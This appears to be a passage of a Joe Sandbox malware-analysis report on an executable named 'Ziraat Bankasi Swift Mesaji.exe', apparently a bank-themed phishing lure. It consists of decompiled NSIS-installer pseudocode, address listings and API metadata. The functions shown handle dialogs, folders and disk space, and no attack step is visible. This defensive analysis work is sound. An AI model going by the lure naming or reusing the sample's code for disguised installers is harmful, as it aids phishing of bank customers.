                                  							if(_v16 != 0) {
                                  								E00403E6C(_v8);
                                  								_t280 = _v32;
                                  								_t315 = 0;
                                  								goto L23;
                                  							} else {
                                  								ShowWindow(_v12, 5);
                                  								E00403E6C(_v12);
                                  								L89:
                                  								return E00403E9E(_a8, _a12, _a16);
                                  							}
                                  						}
                                  						goto L19;
                                  					}
                                  				}
                                  			}


























































                                  0x00404790
                                  0x00404796
                                  0x00404798
                                  0x0040479e
                                  0x004047a4
                                  0x004047b1
                                  0x004047ba
                                  0x004047bd
                                  0x004047c0
                                  0x004049e8
                                  0x004049ef
                                  0x00404a03
                                  0x004049f1
                                  0x004049f3
                                  0x004049f6
                                  0x004049f7
                                  0x004049fe
                                  0x004049fe
                                  0x00404a0f
                                  0x00404a1d
                                  0x00404a20
                                  0x00404a36
                                  0x00404aae
                                  0x00404ab1
                                  0x00404ab3
                                  0x00404abd
                                  0x00404acb
                                  0x00404acb
                                  0x00404acd
                                  0x00404ad7
                                  0x00404add
                                  0x00404afe
                                  0x00404adf
                                  0x00404aec
                                  0x00404aec
                                  0x00404add
                                  0x00404ad7
                                  0x00000000
                                  0x00404ab1
                                  0x00404a3b
                                  0x00404a46
                                  0x00404a4b
                                  0x00404a52
                                  0x00404a59
                                  0x00404a63
                                  0x00404a63
                                  0x00404a67
                                  0x00404a6c
                                  0x00404a71
                                  0x00404a87
                                  0x00404a73
                                  0x00404a73
                                  0x00404a7b
                                  0x00404a82
                                  0x00404a7d
                                  0x00404a7d
                                  0x00404a7d
                                  0x00404a7b
                                  0x00404a8b
                                  0x00404a8d
                                  0x00404a9b
                                  0x00404a9c
                                  0x00404aa8
                                  0x00404aab
                                  0x00404aab
                                  0x00404a6c
                                  0x00000000
                                  0x00404a59
                                  0x00404a3d
                                  0x00404a44
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404b01
                                  0x00404b01
                                  0x00404b08
                                  0x00404b7c
                                  0x00404b83
                                  0x00404b8f
                                  0x00404b8f
                                  0x00404b98
                                  0x00404b9a
                                  0x00404ba1
                                  0x00404ba4
                                  0x00404ba4
                                  0x00404baa
                                  0x00404bb1
                                  0x00404bb4
                                  0x00404bb4
                                  0x00404bba
                                  0x00404bc0
                                  0x00404bc6
                                  0x00404bc6
                                  0x00404bd3
                                  0x00404d20
                                  0x00404d27
                                  0x00404d44
                                  0x00404d4a
                                  0x00404d5c
                                  0x00404d5c
                                  0x00000000
                                  0x00404bd9
                                  0x00404bdb
                                  0x00404be3
                                  0x00404be7
                                  0x00404be7
                                  0x00404bef
                                  0x00404c30
                                  0x00404c32
                                  0x00404c42
                                  0x00404c45
                                  0x00404c4a
                                  0x00404c51
                                  0x00404c54
                                  0x00404cf6
                                  0x00404cfc
                                  0x00404d0a
                                  0x00404d1b
                                  0x00404d1b
                                  0x00000000
                                  0x00404d0a
                                  0x00404c5a
                                  0x00404c5d
                                  0x00404c63
                                  0x00404c68
                                  0x00404c6a
                                  0x00404c6c
                                  0x00404c72
                                  0x00404c79
                                  0x00404c7e
                                  0x00404c85
                                  0x00404c88
                                  0x00404c88
                                  0x00404c8f
                                  0x00404c9b
                                  0x00404c9f
                                  0x00404ca1
                                  0x00404ca1
                                  0x00404c91
                                  0x00404c93
                                  0x00404c93
                                  0x00404cc1
                                  0x00404ccd
                                  0x00404cdc
                                  0x00404cdc
                                  0x00404cde
                                  0x00404ce1
                                  0x00404cea
                                  0x00000000
                                  0x00404bf1
                                  0x00404bfc
                                  0x00404bff
                                  0x00404c04
                                  0x00404c06
                                  0x00404c0a
                                  0x00404c1a
                                  0x00404c24
                                  0x00404c26
                                  0x00404c29
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404c0c
                                  0x00404c0c
                                  0x00404c12
                                  0x00404c14
                                  0x00404c14
                                  0x00404c15
                                  0x00404c16
                                  0x00000000
                                  0x00404c0c
                                  0x00404bef
                                  0x00404bd3
                                  0x00404b10
                                  0x00000000
                                  0x00404b26
                                  0x00404b30
                                  0x00404b35
                                  0x00000000
                                  0x00000000
                                  0x00404b47
                                  0x00404b4c
                                  0x00404b58
                                  0x00404b58
                                  0x00404b5a
                                  0x00404b69
                                  0x00404b6b
                                  0x00404b72
                                  0x00404b75
                                  0x00000000
                                  0x00404b75
                                  0x00404b10
                                  0x004047c6
                                  0x004047cb
                                  0x004047d5
                                  0x004047d6
                                  0x004047df
                                  0x004047ea
                                  0x004047f5
                                  0x004047fb
                                  0x00404809
                                  0x0040481e
                                  0x00404823
                                  0x0040482e
                                  0x00404837
                                  0x0040484c
                                  0x0040485d
                                  0x0040486a
                                  0x0040486a
                                  0x0040486f
                                  0x00404875
                                  0x00404877
                                  0x0040487a
                                  0x0040487f
                                  0x00404884
                                  0x00404886
                                  0x00404886
                                  0x004048a6
                                  0x004048a6
                                  0x004048a8
                                  0x004048a9
                                  0x004048ae
                                  0x004048b1
                                  0x004048b4
                                  0x004048b8
                                  0x004048bd
                                  0x004048c2
                                  0x004048c6
                                  0x004048cb
                                  0x004048d0
                                  0x004048d2
                                  0x004048da
                                  0x004049a4
                                  0x004049b7
                                  0x00000000
                                  0x004048e0
                                  0x004048e3
                                  0x004048e6
                                  0x004048e9
                                  0x004048e9
                                  0x004048ef
                                  0x004048f5
                                  0x004048f8
                                  0x004048fe
                                  0x004048ff
                                  0x00404904
                                  0x0040490d
                                  0x00404914
                                  0x00404917
                                  0x0040491a
                                  0x0040491d
                                  0x00404959
                                  0x00404982
                                  0x0040495b
                                  0x00404968
                                  0x00404968
                                  0x0040491f
                                  0x00404922
                                  0x00404931
                                  0x0040493b
                                  0x00404943
                                  0x0040494a
                                  0x00404952
                                  0x00404952
                                  0x0040491d
                                  0x00404988
                                  0x00404989
                                  0x00404995
                                  0x00404995
                                  0x004049a2
                                  0x004049bd
                                  0x004049c1
                                  0x004049de
                                  0x004049e3
                                  0x004049e6
                                  0x00000000
                                  0x004049c3
                                  0x004049c8
                                  0x004049d1
                                  0x00404d5e
                                  0x00404d70
                                  0x00404d70
                                  0x004049c1
                                  0x00000000
                                  0x004049a2
                                  0x004048da

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 1638840714-813528018
                                  • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                                  • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                                  • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                                  • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                  				signed int _v8;
                                  				struct HWND__* _v12;
                                  				long _v16;
                                  				long _v20;
                                  				char _v24;
                                  				long _v28;
                                  				char _v32;
                                  				intOrPtr _v36;
                                  				long _v40;
                                  				signed int _v44;
                                  				CHAR* _v52;
                                  				intOrPtr _v56;
                                  				intOrPtr _v60;
                                  				intOrPtr _v64;
                                  				CHAR* _v68;
                                  				void _v72;
                                  				char _v76;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t81;
                                  				long _t86;
                                  				signed char* _t88;
                                  				void* _t94;
                                  				signed int _t95;
                                  				signed short _t113;
                                  				signed int _t117;
                                  				char* _t122;
                                  				intOrPtr* _t138;
                                  				signed int* _t145;
                                  				signed int _t148;
                                  				signed int _t153;
                                  				struct HWND__* _t159;
                                  				CHAR* _t162;
                                  				int _t163;
                                  
                                  				_t81 =  *0x41fc68; // 0x0
                                  				_v36 = _t81;
                                  				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                                  				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                                  				if(_a8 == 0x40b) {
                                  					E0040532A(0x3fb, _t162);
                                  					E00405CE3(_t162);
                                  				}
                                  				if(_a8 != 0x110) {
                                  					L8:
                                  					if(_a8 != 0x111) {
                                  						L20:
                                  						if(_a8 == 0x40f) {
                                  							L22:
                                  							_v8 = _v8 & 0x00000000;
                                  							_v12 = _v12 & 0x00000000;
                                  							E0040532A(0x3fb, _t162);
                                  							if(E00405659(_t180, _t162) == 0) {
                                  								_v8 = 1;
                                  							}
                                  							E00405A85(0x41f460, _t162);
                                  							_t145 = 0;
                                  							_t86 = E00405DA3(0);
                                  							_v16 = _t86;
                                  							if(_t86 == 0) {
                                  								L31:
                                  								E00405A85(0x41f460, _t162);
                                  								_t88 = E0040560C(0x41f460);
                                  								if(_t88 != _t145) {
                                  									 *_t88 =  *_t88 & 0x00000000;
                                  								}
                                  								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                  									_t153 = _a8;
                                  									goto L37;
                                  								} else {
                                  									_t163 = 0x400;
                                  									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                                  									_v12 = 1;
                                  									goto L38;
                                  								}
                                  							} else {
                                  								if(0 == 0x41f460) {
                                  									L30:
                                  									_t145 = 0;
                                  									goto L31;
                                  								} else {
                                  									goto L26;
                                  								}
                                  								while(1) {
                                  									L26:
                                  									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
                                  									if(_t113 != 0) {
                                  										break;
                                  									}
                                  									if(_t145 != 0) {
                                  										 *_t145 =  *_t145 & _t113;
                                  									}
                                  									_t145 = E004055BF(0x41f460) - 1;
                                  									 *_t145 = 0x5c;
                                  									if(_t145 != 0x41f460) {
                                  										continue;
                                  									} else {
                                  										goto L30;
                                  									}
                                  								}
                                  								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                  								_v12 = 1;
                                  								_t145 = 0;
                                  								L37:
                                  								_t163 = 0x400;
                                  								L38:
                                  								_t94 = E004046C5(5);
                                  								if(_v12 != _t145 && _t153 < _t94) {
                                  									_v8 = 2;
                                  								}
                                  								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
                                  									E00404610(0x3ff, 0xfffffffb, _t94);
                                  									if(_v12 == _t145) {
                                  										SetDlgItemTextA(_a4, _t163, 0x41f450);
                                  									} else {
                                  										E00404610(_t163, 0xfffffffc, _t153);
                                  									}
                                  								}
                                  								_t95 = _v8;
                                  								 *0x423f44 = _t95;
                                  								if(_t95 == _t145) {
                                  									_v8 = E0040140B(7);
                                  								}
                                  								if(( *(_v36 + 0x14) & _t163) != 0) {
                                  									_v8 = _t145;
                                  								}
                                  								E00403E59(0 | _v8 == _t145);
                                  								if(_v8 == _t145 &&  *0x420484 == _t145) {
                                  									E0040420A();
                                  								}
                                  								 *0x420484 = _t145;
                                  								goto L53;
                                  							}
                                  						}
                                  						_t180 = _a8 - 0x405;
                                  						if(_a8 != 0x405) {
                                  							goto L53;
                                  						}
                                  						goto L22;
                                  					}
                                  					_t117 = _a12 & 0x0000ffff;
                                  					if(_t117 != 0x3fb) {
                                  						L12:
                                  						if(_t117 == 0x3e9) {
                                  							_t148 = 7;
                                  							memset( &_v72, 0, _t148 << 2);
                                  							_v76 = _a4;
                                  							_v68 = 0x420498;
                                  							_v56 = E004045AA;
                                  							_v52 = _t162;
                                  							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
                                  							_t122 =  &_v76;
                                  							_v60 = 0x41;
                                  							__imp__SHBrowseForFolderA(_t122);
                                  							if(_t122 == 0) {
                                  								_a8 = 0x40f;
                                  							} else {
                                  								__imp__CoTaskMemFree(_t122);
                                  								E00405578(_t162);
                                  								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
                                  								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") {
                                  									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
                                  									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
                                  										lstrcatA(_t162, 0x422e40);
                                  									}
                                  								}
                                  								 *0x420484 =  &(( *0x420484)[0]);
                                  								SetDlgItemTextA(_a4, 0x3fb, _t162);
                                  							}
                                  						}
                                  						goto L20;
                                  					}
                                  					if(_a12 >> 0x10 != 0x300) {
                                  						goto L53;
                                  					}
                                  					_a8 = 0x40f;
                                  					goto L12;
                                  				} else {
                                  					_t159 = _a4;
                                  					_v12 = GetDlgItem(_t159, 0x3fb);
                                  					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
                                  						E00405578(_t162);
                                  					}
                                  					 *0x423678 = _t159;
                                  					SetWindowTextA(_v12, _t162);
                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                  					_push(1);
                                  					E00403E37(_t159);
                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                  					_push(0x14);
                                  					E00403E37(_t159);
                                  					E00403E6C(_v12);
                                  					_t138 = E00405DA3(7);
                                  					if(_t138 == 0) {
                                  						L53:
                                  						return E00403E9E(_a8, _a12, _a16);
                                  					}
                                  					 *_t138(_v12, 1);
                                  					goto L8;
                                  				}
                                  			}






































                                  0x0040427b
                                  0x00404282
                                  0x0040428e
                                  0x0040429c
                                  0x004042a4
                                  0x004042a8
                                  0x004042ae
                                  0x004042ae
                                  0x004042ba
                                  0x0040432e
                                  0x00404335
                                  0x0040440a
                                  0x00404411
                                  0x00404420
                                  0x00404420
                                  0x00404424
                                  0x0040442a
                                  0x00404437
                                  0x00404439
                                  0x00404439
                                  0x00404447
                                  0x0040444c
                                  0x0040444f
                                  0x00404456
                                  0x00404459
                                  0x00404490
                                  0x00404492
                                  0x00404498
                                  0x0040449f
                                  0x004044a1
                                  0x004044a1
                                  0x004044bd
                                  0x004044f9
                                  0x00000000
                                  0x004044bf
                                  0x004044c2
                                  0x004044d6
                                  0x004044d8
                                  0x00000000
                                  0x004044d8
                                  0x0040445b
                                  0x0040445f
                                  0x0040448e
                                  0x0040448e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404461
                                  0x00404461
                                  0x0040446e
                                  0x00404473
                                  0x00000000
                                  0x00000000
                                  0x00404477
                                  0x00404479
                                  0x00404479
                                  0x00404484
                                  0x00404487
                                  0x0040448c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040448c
                                  0x004044e7
                                  0x004044ee
                                  0x004044f5
                                  0x004044fc
                                  0x004044fc
                                  0x00404501
                                  0x00404503
                                  0x0040450b
                                  0x00404511
                                  0x00404511
                                  0x00404521
                                  0x0040452b
                                  0x00404533
                                  0x00404549
                                  0x00404535
                                  0x00404539
                                  0x00404539
                                  0x00404533
                                  0x0040454e
                                  0x00404553
                                  0x00404558
                                  0x00404561
                                  0x00404561
                                  0x0040456a
                                  0x0040456c
                                  0x0040456c
                                  0x00404578
                                  0x00404580
                                  0x0040458a
                                  0x0040458a
                                  0x0040458f
                                  0x00000000
                                  0x0040458f
                                  0x00404459
                                  0x00404413
                                  0x0040441a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040441a
                                  0x0040433b
                                  0x00404341
                                  0x0040435b
                                  0x00404360
                                  0x0040436a
                                  0x00404371
                                  0x00404380
                                  0x00404383
                                  0x00404386
                                  0x0040438d
                                  0x00404395
                                  0x00404398
                                  0x0040439c
                                  0x004043a3
                                  0x004043ab
                                  0x00404403
                                  0x004043ad
                                  0x004043ae
                                  0x004043b5
                                  0x004043bf
                                  0x004043c7
                                  0x004043d4
                                  0x004043e8
                                  0x004043ec
                                  0x004043ec
                                  0x004043e8
                                  0x004043f1
                                  0x004043fc
                                  0x004043fc
                                  0x004043ab
                                  0x00000000
                                  0x00404360
                                  0x0040434e
                                  0x00000000
                                  0x00000000
                                  0x00404354
                                  0x00000000
                                  0x004042bc
                                  0x004042bc
                                  0x004042c8
                                  0x004042d2
                                  0x004042df
                                  0x004042df
                                  0x004042e5
                                  0x004042ee
                                  0x004042f7
                                  0x004042fa
                                  0x004042fd
                                  0x00404305
                                  0x00404308
                                  0x0040430b
                                  0x00404313
                                  0x0040431a
                                  0x00404321
                                  0x00404595
                                  0x004045a7
                                  0x004045a7
                                  0x0040432c
                                  0x00000000
                                  0x0040432c

                                  APIs
                                  • GetDlgItem.USER32 ref: 004042C1
                                  • SetWindowTextA.USER32(?,?), ref: 004042EE
                                  • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                                  • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                                  • lstrcmpiA.KERNEL32(szoimsdvi,00420498,00000000,?,?), ref: 004043E0
                                  • lstrcatA.KERNEL32(?,szoimsdvi), ref: 004043EC
                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004043FC
                                    • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                                    • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,C:\Users\user~1\AppData\Local\Temp\,00000000,004031FD,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                                    • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                                    • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,C:\Users\user~1\AppData\Local\Temp\,00000000,004031FD,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                                    • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,C:\Users\user~1\AppData\Local\Temp\,00000000,004031FD,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                                  • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                                  • SetDlgItemTextA.USER32(00000000,00000400,0041F450), ref: 00404549
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                  • String ID: A$C:\Users\user~1\AppData\Local\Temp$szoimsdvi
                                  • API String ID: 2246997448-803804638
                                  • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                                  • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                                  • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                                  • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                  				signed int _v8;
                                  				struct _ITEMIDLIST* _v12;
                                  				signed int _v16;
                                  				signed char _v20;
                                  				signed char _v24;
                                  				signed int _v28;
                                  				signed int _t36;
                                  				CHAR* _t37;
                                  				signed char _t39;
                                  				signed int _t40;
                                  				int _t41;
                                  				char _t51;
                                  				char _t52;
                                  				char _t54;
                                  				char _t56;
                                  				void* _t64;
                                  				signed int _t68;
                                  				signed int _t73;
                                  				signed char _t74;
                                  				char _t81;
                                  				void* _t83;
                                  				CHAR* _t84;
                                  				void* _t86;
                                  				signed int _t93;
                                  				signed int _t95;
                                  				void* _t96;
                                  
                                  				_t86 = __esi;
                                  				_t83 = __edi;
                                  				_t64 = __ebx;
                                  				_t36 = _a8;
                                  				if(_t36 < 0) {
                                  					_t36 =  *( *0x42367c - 4 + _t36 * 4);
                                  				}
                                  				_t73 =  *0x423ed8 + _t36;
                                  				_t37 = 0x422e40;
                                  				_push(_t64);
                                  				_push(_t86);
                                  				_push(_t83);
                                  				_t84 = 0x422e40;
                                  				if(_a4 - 0x422e40 < 0x800) {
                                  					_t84 = _a4;
                                  					_a4 = _a4 & 0x00000000;
                                  				}
                                  				while(1) {
                                  					_t81 =  *_t73;
                                  					if(_t81 == 0) {
                                  						break;
                                  					}
                                  					__eflags = _t84 - _t37 - 0x400;
                                  					if(_t84 - _t37 >= 0x400) {
                                  						break;
                                  					}
                                  					_t73 = _t73 + 1;
                                  					__eflags = _t81 - 0xfc;
                                  					_a8 = _t73;
                                  					if(__eflags <= 0) {
                                  						if(__eflags != 0) {
                                  							 *_t84 = _t81;
                                  							_t84 =  &(_t84[1]);
                                  							__eflags = _t84;
                                  						} else {
                                  							 *_t84 =  *_t73;
                                  							_t84 =  &(_t84[1]);
                                  							_t73 = _t73 + 1;
                                  						}
                                  						continue;
                                  					}
                                  					_t39 =  *(_t73 + 1);
                                  					_t74 =  *_t73;
                                  					_a8 = _a8 + 2;
                                  					_v20 = _t39;
                                  					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                                  					_t68 = _t74;
                                  					_t40 = _t39 | 0x00000080;
                                  					__eflags = _t81 - 0xfe;
                                  					_v28 = _t68;
                                  					_v24 = _t74 | 0x00000080;
                                  					_v16 = _t40;
                                  					if(_t81 != 0xfe) {
                                  						__eflags = _t81 - 0xfd;
                                  						if(_t81 != 0xfd) {
                                  							__eflags = _t81 - 0xff;
                                  							if(_t81 == 0xff) {
                                  								__eflags = (_t40 | 0xffffffff) - _t93;
                                  								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                                  							}
                                  							L41:
                                  							_t41 = lstrlenA(_t84);
                                  							_t73 = _a8;
                                  							_t84 =  &(_t84[_t41]);
                                  							_t37 = 0x422e40;
                                  							continue;
                                  						}
                                  						__eflags = _t93 - 0x1d;
                                  						if(_t93 != 0x1d) {
                                  							__eflags = (_t93 << 0xa) + 0x424000;
                                  							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
                                  						} else {
                                  							E004059E3(_t84,  *0x423ea8);
                                  						}
                                  						__eflags = _t93 + 0xffffffeb - 7;
                                  						if(_t93 + 0xffffffeb < 7) {
                                  							L32:
                                  							E00405CE3(_t84);
                                  						}
                                  						goto L41;
                                  					}
                                  					_t95 = 2;
                                  					_t51 = GetVersion();
                                  					__eflags = _t51;
                                  					if(_t51 >= 0) {
                                  						L12:
                                  						_v8 = 1;
                                  						L13:
                                  						__eflags =  *0x423f24;
                                  						if( *0x423f24 != 0) {
                                  							_t95 = 4;
                                  						}
                                  						__eflags = _t68;
                                  						if(_t68 >= 0) {
                                  							__eflags = _t68 - 0x25;
                                  							if(_t68 != 0x25) {
                                  								__eflags = _t68 - 0x24;
                                  								if(_t68 == 0x24) {
                                  									GetWindowsDirectoryA(_t84, 0x400);
                                  									_t95 = 0;
                                  								}
                                  								while(1) {
                                  									__eflags = _t95;
                                  									if(_t95 == 0) {
                                  										goto L29;
                                  									}
                                  									_t52 =  *0x423ea4;
                                  									_t95 = _t95 - 1;
                                  									__eflags = _t52;
                                  									if(_t52 == 0) {
                                  										L25:
                                  										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                                  										__eflags = _t54;
                                  										if(_t54 != 0) {
                                  											L27:
                                  											 *_t84 =  *_t84 & 0x00000000;
                                  											__eflags =  *_t84;
                                  											continue;
                                  										}
                                  										__imp__SHGetPathFromIDListA(_v12, _t84);
                                  										__imp__CoTaskMemFree(_v12);
                                  										__eflags = _t54;
                                  										if(_t54 != 0) {
                                  											goto L29;
                                  										}
                                  										goto L27;
                                  									}
                                  									__eflags = _v8;
                                  									if(_v8 == 0) {
                                  										goto L25;
                                  									}
                                  									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                                  									__eflags = _t56;
                                  									if(_t56 == 0) {
                                  										goto L29;
                                  									}
                                  									goto L25;
                                  								}
                                  								goto L29;
                                  							}
                                  							GetSystemDirectoryA(_t84, 0x400);
                                  							goto L29;
                                  						} else {
                                  							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
                                  							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
                                  							__eflags =  *_t84;
                                  							if( *_t84 != 0) {
                                  								L30:
                                  								__eflags = _v20 - 0x1a;
                                  								if(_v20 == 0x1a) {
                                  									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                  								}
                                  								goto L32;
                                  							}
                                  							E00405AA7(_t71, _t84, _t95, _t84, _v20);
                                  							L29:
                                  							__eflags =  *_t84;
                                  							if( *_t84 == 0) {
                                  								goto L32;
                                  							}
                                  							goto L30;
                                  						}
                                  					}
                                  					__eflags = _t51 - 0x5a04;
                                  					if(_t51 == 0x5a04) {
                                  						goto L12;
                                  					}
                                  					__eflags = _v20 - 0x23;
                                  					if(_v20 == 0x23) {
                                  						goto L12;
                                  					}
                                  					__eflags = _v20 - 0x2e;
                                  					if(_v20 == 0x2e) {
                                  						goto L12;
                                  					} else {
                                  						_v8 = _v8 & 0x00000000;
                                  						goto L13;
                                  					}
                                  				}
                                  				 *_t84 =  *_t84 & 0x00000000;
                                  				if(_a4 == 0) {
                                  					return _t37;
                                  				}
                                  				return E00405A85(_a4, _t37);
                                  			}





























                                  0x00405aa7
                                  0x00405aa7
                                  0x00405aa7
                                  0x00405aad
                                  0x00405ab2
                                  0x00405ac3
                                  0x00405ac3
                                  0x00405ace
                                  0x00405ad0
                                  0x00405ad5
                                  0x00405ad8
                                  0x00405ad9
                                  0x00405ae0
                                  0x00405ae2
                                  0x00405ae8
                                  0x00405aeb
                                  0x00405aeb
                                  0x00405cc0
                                  0x00405cc0
                                  0x00405cc4
                                  0x00000000
                                  0x00000000
                                  0x00405af8
                                  0x00405afe
                                  0x00000000
                                  0x00000000
                                  0x00405b04
                                  0x00405b05
                                  0x00405b08
                                  0x00405b0b
                                  0x00405cb3
                                  0x00405cbd
                                  0x00405cbf
                                  0x00405cbf
                                  0x00405cb5
                                  0x00405cb7
                                  0x00405cb9
                                  0x00405cba
                                  0x00405cba
                                  0x00000000
                                  0x00405cb3
                                  0x00405b11
                                  0x00405b15
                                  0x00405b1a
                                  0x00405b29
                                  0x00405b2c
                                  0x00405b2e
                                  0x00405b33
                                  0x00405b36
                                  0x00405b39
                                  0x00405b3c
                                  0x00405b3f
                                  0x00405b42
                                  0x00405c5d
                                  0x00405c60
                                  0x00405c90
                                  0x00405c93
                                  0x00405c98
                                  0x00405c9c
                                  0x00405c9c
                                  0x00405ca1
                                  0x00405ca2
                                  0x00405ca7
                                  0x00405caa
                                  0x00405cac
                                  0x00000000
                                  0x00405cac
                                  0x00405c62
                                  0x00405c65
                                  0x00405c7a
                                  0x00405c81
                                  0x00405c67
                                  0x00405c6e
                                  0x00405c6e
                                  0x00405c89
                                  0x00405c8c
                                  0x00405c55
                                  0x00405c56
                                  0x00405c56
                                  0x00000000
                                  0x00405c8c
                                  0x00405b4a
                                  0x00405b4b
                                  0x00405b51
                                  0x00405b53
                                  0x00405b6d
                                  0x00405b6d
                                  0x00405b74
                                  0x00405b74
                                  0x00405b7b
                                  0x00405b7f
                                  0x00405b7f
                                  0x00405b80
                                  0x00405b82
                                  0x00405bbb
                                  0x00405bbe
                                  0x00405bce
                                  0x00405bd1
                                  0x00405bd9
                                  0x00405bdf
                                  0x00405bdf
                                  0x00405c3b
                                  0x00405c3b
                                  0x00405c3d
                                  0x00000000
                                  0x00000000
                                  0x00405be3
                                  0x00405bea
                                  0x00405beb
                                  0x00405bed
                                  0x00405c07
                                  0x00405c15
                                  0x00405c1b
                                  0x00405c1d
                                  0x00405c38
                                  0x00405c38
